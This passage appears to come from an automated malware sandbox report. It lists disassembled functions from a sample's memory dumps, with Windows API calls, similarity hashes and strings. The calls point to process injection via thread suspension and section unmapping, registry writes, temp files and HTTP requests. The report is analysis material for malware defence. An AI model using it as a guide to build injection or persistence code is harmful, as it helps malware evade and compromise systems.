    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7B90, Relevance: 7.6, APIs: 5, Instructions: 62 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5B7B, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 25memory
Similarity
  • Total matches: 25
  • API ID: HeapFreeRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionmemcpy
  • String ID:
  • API String ID: 229461383-0
  • Opcode ID: bbc3c6a859906d8649009038d034178e5739454c1ef541e28150f978055748ba
  • Instruction ID: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
  • Opcode Fuzzy Hash: EDE06870284402D5901B6489BC4AA32FA0BFA813CADCD411BDD613924D3AC305A57B18
  • Instruction Fuzzy Hash: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
  • memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001CAE7F: lstrcmpi.KERNEL32(?,001EC4EA), ref: 001CAED6
    • Part of subcall function 001CAE7F: HeapFree.KERNEL32(00000000,00000000,001C5C01), ref: 001CAF03
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B34B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001D81E6, Relevance: 7.5, APIs: 5, Instructions: 35 Total matches: 108
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE6E9, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123 Total matches: 37
Similarity
  • Total matches: 37
  • API ID: GetLastErrorGetVersion
  • String ID: GET$POST
  • API String ID: 2325875326-3192705859
  • Opcode ID: 26b0fd4c2e62fc57389cc46e4c3039c84c7b440f69484f47d42f00f4ba49821f
  • Instruction ID: 2d848e266604d7f3202df0d77fbb157f043afe7d069b6b050c1dca03819d605d
  • Opcode Fuzzy Hash: BC014CB305DC52EBD17BB6950006FB39B84DF12AF6CDC611079816A3DCBE8072355B40
  • Instruction Fuzzy Hash: 2d848e266604d7f3202df0d77fbb157f043afe7d069b6b050c1dca03819d605d
APIs
    • Part of subcall function 001D9640: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,001DE6F9,00000008,00000000,00000000,?,?,001DE988,?,?,00000001,00000000,00000000), ref: 001D9649
    • Part of subcall function 001D9640: mbstowcs.NTDLL ref: 001D9670
    • Part of subcall function 001D9640: memset.NTDLL ref: 001D9682
  • GetVersion.KERNEL32(00000008,00000000,00000000,?,?,001DE988,?,?,00000001,00000000,00000000,?,00000008,00000030), ref: 001DE705
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(00000008,00000000,00000000,?,?,001DE988,?,?,00000001,00000000,00000000,?,00000008,00000030), ref: 001DE834
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1473, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61 Total matches: 61memory
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D74F7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57 Total matches: 53
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA6B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3ACC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE37D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44 Total matches: 70
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CC42B, Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 262 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF4FD, Relevance: 6.2, APIs: 4, Instructions: 192 Total matches: 92string
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC212, Relevance: 6.1, APIs: 4, Instructions: 108 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE3AA, Relevance: 6.1, APIs: 4, Instructions: 104 Total matches: 59stringtime
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E94, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D892D, Relevance: 6.1, APIs: 4, Instructions: 93 Total matches: 207
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6604, Relevance: 6.1, APIs: 4, Instructions: 83 Total matches: 29memoryregistry
Similarity
  • Total matches: 29
  • API ID: HeapFreeRegisterWaitForSingleObjectRtlAllocateHeapmemcpy
  • String ID:
  • API String ID: 1976740423-0
  • Opcode ID: 00e719380342739fce2d9a83077352ae1e8e636be9c83fb6a114a482fd48beda
  • Instruction ID: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
  • Opcode Fuzzy Hash: 8CF059B0118943C9E83B20D21991BBEAB423F935CBC0E4631E40308A4F1E4762B63A98
  • Instruction Fuzzy Hash: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C665D
  • memcpy.NTDLL(00000018,?,?), ref: 001C6686
  • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_00005549,00000000,000000FF,00000008), ref: 001C66C5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C66D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE0EE, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 60
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7262, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 95string
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
